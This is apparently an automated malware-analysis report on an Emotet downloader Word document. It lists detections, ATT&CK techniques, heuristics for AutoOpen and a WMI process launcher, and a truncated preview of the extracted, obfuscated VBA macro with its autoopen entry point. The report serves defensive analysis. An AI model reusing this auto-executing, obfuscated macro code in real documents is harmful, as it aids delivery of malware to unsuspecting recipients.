Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is identified as malicious by ClamAV with a specific Emotet signature. High-severity heuristics indicate the presence of auto-executing VBA macros, including the use of GetObject and WMI to launch processes. The VBA script, although obfuscated, likely facilitates the execution of a secondary payload, consistent with Emotet's behavior.
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6942082-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6942082-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 8b3522cb1f68e76b7a0e6253bcbcb08fe8f393f124c27a6178817d811899605a) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58751 bytes |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "EkAAXAU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "mUCAZ1XB"
Attribute VB_Base = "0{16694029-35A0-43A6-BEE3-457F589E2D4D}{E88BC16E-5E4C-4D83-96B7-90DCF78AE2F1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "AAZCUAcB"
Attribute VB_Base = "0{E810495C-D7FB-4977-A1D0-8839E2FD276F}{0D3C42FA-78CA-48FB-8817-B8244188C7CC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zxAowA"
Sub autoopen()
If lAG4CQ = sQwUZD Then
Select Case GAGQcQ
Case 508762488
GUAAABxA = 190419696
OkAZUo1o = cXAcQACA
m1UBAxAC = Asc(981736341 + Log(196187721 - Rnd(VABxwX)) / 844240778 + Oct(111019734))
Case 464814719
wBZXAA = PAcwxU
j4DAAAA = IQGQ1x
GAAQBw = CDate(782858085 - Cos(318379711 * Rnd(129490134) + 967422270 * 246634435) * r4AAAZDA / Round(111910574))
Case 337835668
EoUc1cAZ = iUABU4BA
SAAAUAkZ = CStr(398077495)
UCAAAU = Atn(320148561 + Atn(843031471) * wACCQB * CDate(ZAXGAU + 36 + M4wBQDU / CStr(oDDDXA)))
End Select
End If
If DZAXAAAQ = z_XoAZ Then
Select Case YCwoXBB
Case 664392449
QoUAkA = 662748381
GAXQDDUw = Zc_ZQXQ4
f4cXwX = Asc(605882810 + Log(343895722 - Rnd(BwAAAA1)) / 184685101 + Oct(863003627))
Case 771304559
iQADBUX = d_4AZAc
ZAAQBA = iDADAAQx
HkDwAB = CDate(783288910 - Cos(468116216 * Rnd(762989119) + 301119723 * 358753013) * OAU1UAkC / Round(789281521))
Case 12820256
qAwAADAQ = WQAABAUZ
J_AAxAA = CStr(849245303)
SDDADA = Atn(566204897 + Atn(644556852) * FoAAXA * CDate(iDB1wZ4A + 36 + pAAUGBZ / CStr(sBQXAQB)))
End Select
End If
UwB1UQwC
If ICCUAQ = fQUCADA Then
Select Case LkA4BUBA
Case 522038515
N_QDAQ = 777522849
zAAAAAQ = fBQGXAU
iQDAAxAA = Asc(142665408 + Log(14718154 - Rnd(ZBAQAD)) / 465370682 + Oct(763059741))
Case 337443544
TBAUQBAD = DXo_AoA
JQ_AkAoA = MQDAGAw
ZAoGUA = CDate(422122986 - Cos(391451164 * Rnd(40320197) + 37931278 * 904644653) * mUAAABQA / Round(665083796))
Case 413879902
UoUBXAGZ = KABA_UB
XAUQCA = CStr(354284327)
doAACGc = Atn(905138106 + Atn(700593001) * OwGQwXA_ * CDate(F4A1_B + 36 + nBACAC / CStr(tDXABcAc)))
End Select
End If
If DAk4ACDx = OAo1CAD Then
Select Case OxAZQAA
Case 815241942
vAAGU_QC = 333925864
FkBwBCA = XBXUAU
iUUA1DAG = Asc(122091247 + Log(777434450 - Rnd(UCQ_kXAA)) / 275770160 + Oct(952271384))
Case 961085550
z_AAQwU = SA_UAx1
IUAUZDA = pxGAAB
jXADBQG = CDate(801191006 - Cos(607008848 * Rnd(137599686) + 11020541 * 717538314) * wUZAoAAc / Round(989147099))
Case 16043676
uACUoA4A = jD4AcA
lBoADCAC = CStr(943392658)
hXAo4o = Atn(498288897 + Atn(868020224) * UkCZAD * CDate(wQDDA1 + 36 + zDcBCG / CStr(mCUwxA_)))
End Select
End If
If iDBAAZD = S4DGQAA Then
Select Case Gc4ABA4
Case 7646736
BcAAAGD = 448069444
tQGQQA4 = mkAAAAQ
aAA1A__ = Asc(542188858 + Log(630524136 - Rnd(BU4xBU)) / 614627097 + Oct(327344726))
Case 62855792
CQAAZQCc = oBA_ABXX
... (truncated)
```